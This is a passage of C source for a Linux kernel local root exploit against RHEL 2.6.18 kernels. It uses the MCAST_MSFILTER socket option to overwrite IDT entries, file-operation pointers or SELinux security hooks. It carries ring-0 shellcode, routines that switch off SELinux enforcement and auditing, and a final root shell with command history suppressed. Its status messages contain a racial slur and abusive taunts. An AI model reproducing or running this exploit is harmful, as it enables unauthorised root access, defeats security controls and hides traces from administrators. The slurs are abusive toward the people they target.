"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";  

#define CJE_4554TFFDTRMAJHD_OFF  10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF      23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";           


/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

 struct LSM_rhel 

  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;

   __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;

   const char *krelease; 
  const char *kversion;

 };

 struct LSM_rhel known_targets[4]=
{
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,

     0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

     "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,

    0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

    "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,

     0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,

     "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops

     0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled

     "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }

 };

 static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

 struct socketcallAT
{
  int s;
  int level;
  int optname;
  void *optval;
  volatile socklen_t *optlen;  
}__attribute__((packed));

 struct idt64from32_s 
{
  unsigned short limit;
  unsigned long base;
}__attribute__((packed));

 static __yyrhdgdtfs66ytgetrfd getidt()
{
  struct idt64from32_s idt;
  memset(&idt, 0x00, sizeof(struct idt64from32_s));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000ULL;
}
static int isSelinuxEnabled()
{
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH, "r");
  if(selinux_f == NULL)
  {
    if(errno == EPERM)
      return 1;
    else 
     return 0;
  }

   fclose(selinux_f);
  return 1;
}

 static int wtfyourunhere_heee(char *out_release, char* out_version)
{
 int ret; const char*ptr;
 int count=0;
 char r[32], *bptr;
 struct utsname buf;
 ret =  uname(&buf);

  if(ret < 0)
   return -1; 

  strcpy(out_release, buf.release);
 strcpy(out_version, buf.version);

  ptr = buf.release;
 bptr = r;
 memset(r, 0x00, sizeof(r)); 
 while(*ptr)
 {
   if(count == 2)
    {
      if(*ptr >= '0' && *ptr <= '9')
        *bptr++ = *ptr;
      else
        break;
    }

    if(*ptr == '.')
     count++;
   ptr++;
 }

  if(strlen(r) < 1 || !atoi(r))
   return -1; 

  return atoi(r); 
}
static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
  __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
  __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
}
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];

   if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;

   ka = fopen(filename, "r");
  if(!ka)
    return 0;

   while(fgets(line, 512, ka) != NULL)
  {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p    = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    while(*l_p != ' ' && (ra_p - reloc_a)  < 64)
      *ra_p++ = *l_p++;  
    l_p += 3;
    while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
      *r_p++ = *l_p++;

     if(!strcmp(reloc, s))
    {
      __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a);
      return strtoull(reloc_a, NULL, 16); 
    }
  }

   return 0; 
}
static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
  return get_sym_ex(s, KALLSYMS, 0);
}

 static int parse_cred(const char* val)
{
  int i=0;
  const char* p = val;
  char local[64], *l;
  for(i=0; i<3; i++)  
  {
    memset(local, 0x00, sizeof(local));
    l = local;
    while(*p && *p != ',')
      *l++ = *p++;

     if(!(*p) && i != 2)
      return -1;

     _m_cred[i] = strtoull(local, NULL, 16);
    p++;
  }

   return 0; 
}
#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

 struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm = &(known_targets[0]);

    if(check_rhel && !isRHHGDPPLADSF(krelease))
   {
     __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n");
     return NULL;
   }

    __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n");
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
   {
     if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
     {
       __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }

    __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n");
   strcpy(mapbuf, "/boot/System.map-");
   strcat(mapbuf, krelease);

    dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);
   if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
      !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops ||
      !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
  return NULL;
   return &dyn4nt4n1labeggeyrthryt;
}

 static void put_your_hands_up_hooker(int argc, char *argv[])
{
  int fd,ver,ret;
  char __b[16];
  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd >= 0 && ret > 0))
  {
    __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);

   ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("!!!  Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n");

   __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease);
  if(argc != 1)
  {
    while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0)
    {
      switch(ret)
      {
        case 'i':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          useidt=1; // u have to use -i to force IDT Vector
          break;

         case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;

   case 'l':
    flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
    break;

         case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n");
          break;

         case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
       __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n");
          break;

         case 's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;

         case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
    else
      __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
          break;
      }
    }
  }
  if(ver >= 29) // needs cred structure 
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;

     if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); 
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }

     if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
    }

     __pppp_tegddewyfg("$$$ Kernel Credentials detected\n");
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }

   if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);

     if(!_m_cpu_off) 
      __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");

     __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}
static void env_prepare(int argc, char* argv[])
{

   put_your_hands_up_hooker(argc, argv);

   if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  // try fops
  {
    __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);

     /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
     * Thanks to the guy who killed this vector... you know who you are:)
     * Lucky for you, there are more:) 
     */

     if(_m_fops) 
    {
      usefops=1;
      __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n");
    }
  }
  if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
  {
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target)
    {
       __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n"); 
    }
    else
      uselsm=1;
  }
  if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n");
       /* remove Selinux Flag */
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }
  if(!usefops && !useidt && !uselsm)
    __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^@* try an0th3r 0d4y L0l\n");  
}
static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}

 static struct socketcallAT at;
static __dgdhdytrg55 idtover[4] = 
             {0x00100000UL, 
              0x0020ee00UL, 
              0x00000000UL, 
              0x00000000UL};
static void fillsocketcallAT()
{
 at.s = s;
 at.level = SOL_IP;
 at.optname = MCAST_MSFILTER;
 at.optval = buffer;
 at.optlen = &magiclen;
}
static void bitch_call(struct socketcallAT *at, void *stack)
{
  asm volatile(
      "push %%ebx\t\n"
      "push %%esi\t\n"
      "push %%ecx\t\n"
      "push %%edx\t\n"
      "movl $0x66, %%eax\t\n"
      "movl $0xf, %%ebx\t\n"
      "movl %%esp, %%esi\t\n" 
      "movl %0, %%ecx\t\n"
      "movl %1, %%esp\t\n"
      "int $0x80\t\n"
      "movl %%esi, %%esp\t\n"
      "pop %%edx\t\n"
      "pop %%ecx\t\n"
      "pop %%esi\t\n"
      "pop %%ebx\t\n"
      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
     );
}

 static void __setmcbuffer(__dgdhdytrg55 value)
{
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
    *(p+i) = value;
}

 static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase)
{
  int i;
  __dgdhdytrg55 curr;
  for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++)
  {
    curr = idtover[i]; 
    __setmcbuffer(curr);
    magiclen =  get_socklen(idtbase + (i*4), Y0Y0STOP);
    bitch_call(&at, (void*)Y0Y0STOP);
  } 
}
static void y0y0stack()
{
  void* map = mmap((void*)Y0Y0SMAP, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_WRITE, 
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap"); 
}

 static void y0y0code()
{
  void* map = mmap((void*)Y0Y0CMAP, 
                   PAGE_SIZE, 

 #ifdef TRY_REMAP_DEFAULT 
       PROT_READ|PROT_WRITE,
#else
                   PROT_READ|PROT_WRITE|PROT_EXEC, 
#endif
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap"); 

 }
static int rey0y0code(unsigned long old)
{
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];

   getcwd(cwd, sizeof(cwd));  
  strcat(cwd, "/__tmpfile");

   unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd < 0)
    return -1; 

   write(fd, (const void*)old, PAGE_SIZE); 
  if(munmap((void*)old, PAGE_SIZE) < 0)
    return -1;

   map = mmap((void*)old, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_EXEC, 
                   MAP_PRIVATE|MAP_FIXED, 
                   fd,0);
  if(map == MAP_FAILED)
    return -1; 

   /* avoid lazy page fault handler 
   * Triple Fault when using idt vector 
   * and no pages are already mapped:)
   */

   wizard = *((char*)old);
  unlink(cwd);
  return wizard; 
}
int main(int argc, char*argv[])
{
  int uid,fd;
  __yyrhdgdtfs66ytgetrfd *patch, idtb;
  struct pollfd pfd;
  printf(BANNER);

   uid = getuid();

   env_prepare(argc, argv);

   y0y0stack(); 
  y0y0code();

   if(useidt)
  {
    idtb = getidt();
    __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb);
    __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n");   
    patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

     __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");

     if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
    {
      __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
    }

     __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  }
  else if(usefops || uselsm)
  {
    __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n");   
    patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

     __setmcbuffer(J0J0S);

     __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
    if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
    {
        __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
  p4tch_sel1nux_codztegfaddczda(curr_target);
    } 
    __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
  }

  /* set shellcode level 2 */
  if(flags & KERN_DGGDYDTEGGETFDRLAK)
  {
    __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  }
  else
  {
    __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
  }

   __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n");
  s = socket(AF_INET, SOCK_DGRAM, 0);
  if(s < 0)
    __xxxfdgftr_hshsgdt("socket");

   fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n");
#endif

   if(useidt)
  {

     __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
    __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd);
    idt_smash((idtentry));

     sleep(1);
    asm volatile("int $0xdd\t\n");
  }
  else if(usefops)
  {
    magiclen = get_socklen(_m_fops, Y0Y0STOP);
    magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
    __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen); 

     __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n");
    bitch_call(&at, (void*)Y0Y0STOP);
    sleep(1);

     fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
    if(fd < 0)
      __xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st");

     pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
  }
  else if(uselsm)
  {
    int msqid;
    __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
    msqid = msgget(0, IPC_PRIVATE|0600);
    if(msqid < 0)
      __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t");
    magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
  }

   munmap((void*)Y0Y0CMAP, PAGE_SIZE);

   /* exec */
  if(getuid() == 0)
  {
    pid_t pid;
    __pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n");
    pid = fork();
    if(pid == 0)
    {
      char *args[] = {"/bin/sh", "-i", NULL};
      char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
                      "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
      execve("/bin/sh", args, envp);
    } 
    else  
    {
      int status;
      waitpid(pid, &status, 0);
    }
  }
  else
    __pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n");

   close(s);
  return 0;
}

SITE INFO

Copyright © 2013 Ilyas Cyber4rt. All rights reserved.